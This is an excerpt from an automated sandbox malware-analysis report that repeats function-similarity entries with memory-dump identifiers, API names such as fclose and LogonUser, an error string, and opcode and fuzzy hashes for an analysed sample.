                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 17849adbd24b951f4aeb0e148422a47da2da14e58c0ef747395e598f3a492db1
                  • Instruction ID: 4a05fdafed7e73f30e254f738c5bf47c04118800ba140e6ff2ba3c3a9247edb0
                  • Opcode Fuzzy Hash: 17849adbd24b951f4aeb0e148422a47da2da14e58c0ef747395e598f3a492db1
                  • Instruction Fuzzy Hash: 7CF05E13B08A0381F973BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
                  • Instruction ID: a6267ff4d29a2a2f4cfaf063ff864935e7f83a5909f29d36a9c409f436961634
                  • Opcode Fuzzy Hash: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
                  • Instruction Fuzzy Hash: E4F05E13B08A0781F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
                  • Instruction ID: 425d62ac2a78b4f102df9f273988b8e795a1de69fbb95806e175e3d1e26f67f3
                  • Opcode Fuzzy Hash: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
                  • Instruction Fuzzy Hash: F8F05E13B08A0381F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
                  • Instruction ID: a1ec64a3060b2f7715f7278177b47906e5361ecf9de66f769aa4b4d5858c0cf3
                  • Opcode Fuzzy Hash: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
                  • Instruction Fuzzy Hash: EAF05E13B08A0381F972BE0BB9D07B9D2412F81765EC995378D5C0ABD1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
                  • Instruction ID: 368cca5a53d4d506b5b9a5e7d9fc27b524a65b927eadc9adf09a672daab8df07
                  • Opcode Fuzzy Hash: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
                  • Instruction Fuzzy Hash: 0DF05E13B08A03C1F972BE0BB9D07B992412F81765EC99537CD5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
                  • Instruction ID: 2afabbb282ea2a9b0c1c72107c900aa32e6b6e194a0ca9386b7b663af36bb1bd
                  • Opcode Fuzzy Hash: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
                  • Instruction Fuzzy Hash: 52F05E13B08A0381F972BE0BB9D17B992412F81765EC995378D5C0B7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
                  • Instruction ID: 2afabbb282ea2a9b0c1c72107c900aa32e6b6e194a0ca9386b7b663af36bb1bd
                  • Opcode Fuzzy Hash: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
                  • Instruction Fuzzy Hash: 52F05E13B08A0381F972BE0BB9D17B992412F81765EC995378D5C0B7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
                  • Instruction ID: a6267ff4d29a2a2f4cfaf063ff864935e7f83a5909f29d36a9c409f436961634
                  • Opcode Fuzzy Hash: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
                  • Instruction Fuzzy Hash: E4F05E13B08A0781F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
                  • Instruction ID: 425d62ac2a78b4f102df9f273988b8e795a1de69fbb95806e175e3d1e26f67f3
                  • Opcode Fuzzy Hash: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
                  • Instruction Fuzzy Hash: F8F05E13B08A0381F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: dde45c4a61171a6f2f2a96ed9fe8fac32039376184f1b4fd4d8aaa71f1959305
                  • Instruction ID: 87b7740fd858ff7aa1dd371923c778b127a61de36a90ce6830884930752b716d
                  • Opcode Fuzzy Hash: dde45c4a61171a6f2f2a96ed9fe8fac32039376184f1b4fd4d8aaa71f1959305
                  • Instruction Fuzzy Hash: 3FF05E13B08A0381F973BE0BB8D07B992412F81765EC995378D5C0BBD1EE3DA882C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
                  • Instruction ID: a1ec64a3060b2f7715f7278177b47906e5361ecf9de66f769aa4b4d5858c0cf3
                  • Opcode Fuzzy Hash: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
                  • Instruction Fuzzy Hash: EAF05E13B08A0381F972BE0BB9D07B9D2412F81765EC995378D5C0ABD1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
                  • Instruction ID: 368cca5a53d4d506b5b9a5e7d9fc27b524a65b927eadc9adf09a672daab8df07
                  • Opcode Fuzzy Hash: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
                  • Instruction Fuzzy Hash: 0DF05E13B08A03C1F972BE0BB9D07B992412F81765EC99537CD5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 17849adbd24b951f4aeb0e148422a47da2da14e58c0ef747395e598f3a492db1
                  • Instruction ID: 4a05fdafed7e73f30e254f738c5bf47c04118800ba140e6ff2ba3c3a9247edb0
                  • Opcode Fuzzy Hash: 17849adbd24b951f4aeb0e148422a47da2da14e58c0ef747395e598f3a492db1
                  • Instruction Fuzzy Hash: 7CF05E13B08A0381F973BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
                  • Instruction ID: a6267ff4d29a2a2f4cfaf063ff864935e7f83a5909f29d36a9c409f436961634
                  • Opcode Fuzzy Hash: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
                  • Instruction Fuzzy Hash: E4F05E13B08A0781F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
                  • Instruction ID: 425d62ac2a78b4f102df9f273988b8e795a1de69fbb95806e175e3d1e26f67f3
                  • Opcode Fuzzy Hash: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
                  • Instruction Fuzzy Hash: F8F05E13B08A0381F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
                  • Instruction ID: a1ec64a3060b2f7715f7278177b47906e5361ecf9de66f769aa4b4d5858c0cf3
                  • Opcode Fuzzy Hash: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
                  • Instruction Fuzzy Hash: EAF05E13B08A0381F972BE0BB9D07B9D2412F81765EC995378D5C0ABD1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
                  • Instruction ID: 368cca5a53d4d506b5b9a5e7d9fc27b524a65b927eadc9adf09a672daab8df07
                  • Opcode Fuzzy Hash: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
                  • Instruction Fuzzy Hash: 0DF05E13B08A03C1F972BE0BB9D07B992412F81765EC99537CD5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
                  • Instruction ID: 2afabbb282ea2a9b0c1c72107c900aa32e6b6e194a0ca9386b7b663af36bb1bd
                  • Opcode Fuzzy Hash: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
                  • Instruction Fuzzy Hash: 52F05E13B08A0381F972BE0BB9D17B992412F81765EC995378D5C0B7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
